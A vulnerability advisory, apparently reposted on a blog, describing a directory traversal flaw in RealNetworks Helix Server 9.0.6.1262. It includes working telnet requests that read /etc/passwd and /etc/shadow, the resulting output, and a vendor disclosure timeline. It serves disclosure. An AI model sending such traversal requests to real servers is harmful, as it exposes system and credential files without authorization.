RealNetworks Helix Server URI Traversal Arbitrary File Access Vendor: RealNetworks (http://www.realnetworks.com/) Product: Helix Server (http://www.realnetworks.com/products/media_delivery.html) Version: 9.0.6.1262 Exploit details: $ telnet 1.2.3.4 80 Trying 1.2.3.4... Connected to 1.2.3.4. Escape character is '^]'. OPTIONS / RTSP/1.0 RTSP/1.0 200 OK CSeq: 0 Date: Sat, 15 Mar 2008 00:28:48 GMT Server: Helix Server Version 9.0.6.1262 (linux-2.2-libc6-i586-server) (RealServer compatible) Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN RealChallenge1: c4x0ft2b97ec020481e88d9defa4f707 StatsMask: 3 Connection closed by foreign host. $ telnet 1.2.3.4 80 Trying 1.2.3.4... Connected to 1.2.3.4. Escape character is '^]'. GET //./././././../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync [..] Connection closed by foreign host. $ telnet 1.2.3.4 80 Trying 1.2.3.4... Connected to 1.2.3.4. Escape character is '^]'. GET //./././././../../../../../etc/shadow root:HashedPasswdOMG:13885:0:99999:7::: bin:*:13187:0:99999:7::: daemon:*:13187:0:99999:7::: adm:*:13187:0:99999:7::: lp:*:13187:0:99999:7::: sync:*:13187:0:99999:7::: [..] Connection closed by foreign host. $ Timeline: Reported to vendor: 2008-06-16 Vendor ack: 2008-06-16 Vendor solution: Fixed with the release of v.11.x (Nov. 2005) and any v.12 in 2006-Q2 Afterthoughts: This was discovered during a vulnerability assessment. The client was running outdated software. The vulnerability was actually discovered by Nessus, one of the web server related plugins fired, tried a traversal and found this. Real's response and immediate reply (mail, and then phone call with extensive discussion) was very well handled. Kudo's to them for taking security seriously.
RealNetworks Helix Server URI Traversal Arbitrary File Access
最新推荐文章于 2023-12-06 20:08:37 发布